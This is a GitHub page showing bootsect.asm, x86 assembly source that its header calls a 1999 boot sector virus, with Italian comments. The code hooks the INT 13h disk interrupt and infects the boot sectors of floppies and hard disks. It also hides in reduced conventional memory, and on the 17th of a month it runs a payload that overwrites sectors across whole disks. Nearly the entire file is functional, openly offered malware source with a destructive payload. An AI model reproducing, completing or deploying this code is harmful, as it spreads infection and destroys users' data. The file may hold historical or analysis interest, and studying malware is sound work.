-
Notifications
You must be signed in to change notification settings - Fork 2
/
bootsect.asm
252 lines (191 loc) · 6.92 KB
/
bootsect.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
; boot sector virus. Thanks to those who kept this old file.
; Written in January 1999. Detected by TBAV.
; Some pieces of code are removed.
.MODEL TINY
.CODE
ORG 0000h
start: JMP init_code
os_struct DB 85 DUP (?)
init_code: DB 0EAh
DW OFFSET next_istruction
DW 07C0h
old_int_13:
old_offset DW ?
old_segment DW ?
first_mem DW OFFSET load_os
new_segment DW ?
; ------------------------------
; Questa sezione contiene il nuovo INT13
; ------------------------------
new_int_13: PUSH DS
PUSH AX
CMP AH, 02h
JZ v1
CMP AH, 03h
JZ v1
old: POP AX
POP DS
JMP DWORD PTR CS:[old_int_13]
v1: CMP CX, 0001h
JZ v2
JMP old
v2: CMP DH, 00h
JZ v3
JMP old
v3: PUSH BX
PUSH CX
PUSH DX
PUSH ES
PUSH SI
PUSH DI
PUSH CS
POP ES
MOV AX, 0201h ; Legge il settore originale
MOV BX, 0200h
PUSHF
CALL DWORD PTR CS:[old_int_13]
MOV AX, WORD PTR CS:[signature]
MOV BX, WORD PTR CS:[0200h]+OFFSET signature
CMP AX, BX
JZ v5
CMP DL, 80h
JB V4_0
MOV AX, 0301h
MOV BX, 0200h
MOV CX, 0002h
PUSHF
CALL DWORD PTR CS:[old_int_13]
JMP v4
v4_0: MOV AX, CS
MOV DS, AX
MOV SI, 0200h+003h
MOV DI, 0003h
MOV CX, 0055h
REP MOVSB
v4: MOV AX, 0301h
XOR BX, BX
MOV CX, 0001h
PUSHF
CALL DWORD PTR CS:[old_int_13]
v5: CMP DL, 80h
JNB v6
JMP v0
v6: PUSH SS
POP ES
PUSH SP
POP BX
INC WORD PTR ES:[BX]+08
v0: POP DI ; +00
POP SI ; +02
POP ES ; +04
POP DX ; +06
POP CX ; +08
POP BX ; +0A
JMP old
;--------------------------------
; Questa sezione contiene il payload
check_payload: MOV AH, 04h
INT 1Ah
CMP DL, 17h
JZ payload
RET
current_disk DB 80h
sector DB ?
max_head DB ?
cylinder DW ?
payload: ; Visualizza il nome
payload_destroy: MOV AH, 08h
MOV DL, BYTE PTR CS:[current_disk]
PUSHF
CALL DWORD PTR [old_int_13]
JC error
MOV BYTE PTR CS:[max_head], DH
MOV BYTE PTR CS:[cylinder], CH
PUSH CX
MOV AX, CX
XOR AH, AH
MOV CL, 2
SHL AL, CL
SHR AL, CL
MOV BYTE PTR CS:[sector], AL
POP CX
MOV AX, CX
XOR AH, AH
MOV CL, 6
SHR AL, CL
MOV BYTE PTR CS:[cylinder+1], AL
PUSH CS
POP ES
MOV BX, 0000h
MOV CX, WORD PTR CS:[cylinder]
change_cylinder: PUSH CX
XCHG CL, CH
SHL CL, 6 ; Qui le istruzioni vengono alterate dal
; compilatore
INC CX ; Aggiunge 1 per indicare il settore iniziale
over_write: MOV AH, 03h
MOV AL, BYTE PTR CS:[sector]
MOV DL, BYTE PTR CS:[current_disk]
; CX Š gi… preparato
CMP DH, BYTE PTR CS:[max_head]
JB next_cylinder
PUSHF
CALL DWORD PTR [old_int_13]
INC DH
next_cylinder: POP CX
LOOP change_cylinder
INC BYTE PTR CS:[current_disk]
JMP payload_destroy
error: DB 0EAh
DW 0FFF0h
DW 0F000h
next_istruction: XOR AX, AX
MOV DS, AX
continue: CLI
MOV SS, AX
MOV SP, 07C00h
STI
MOV AX, WORD PTR [004Ch] ; Preserva il vecchio INT13
MOV WORD PTR CS:[old_offset], AX ; nel codice virale
MOV AX, WORD PTR [004Eh]
MOV WORD PTR CS:[old_segment], AX
MOV AX, WORD PTR [0413h] ; Decrementa di 2 kb la memoria
DEC AX ; convenzionale
MOV WORD PTR DS:[0413h], AX
MOV CL, 06h
SHL AX, CL
MOV ES, AX ; Ecco il nuovo indirizzo
; dove caricare il virus
MOV WORD PTR CS:[new_segment], AX
MOV AX, OFFSET new_int_13 ; E lo installa nella tabella
; degli INTERRUPT
MOV WORD PTR DS:[004Ch], AX
MOV WORD PTR DS:[004Eh], ES
PUSH CS
POP DS
MOV CX, 0200h
XOR SI, SI
XOR DI, DI
CLD
REP MOVSB ; Il virus e' trasferito
JMP DWORD PTR CS:[first_mem]
load_os: CALL check_payload
; Carica il sistema operativo
XOR AX, AX
MOV ES, AX
MOV BX, 7C00h
MOV AH, 00h
INT 13h
MOV AH, 02h
MOV AL, 01h
MOV CX, 0001h
MOV DL, 80h
MOV DH, 00h
INT 13h
DB 0EAh
DW 07C00h
DW 0000h
data_error: DB 29 DUP (?)
signature DB "SIGNAT"
DB 55h, 0AAh
END init_code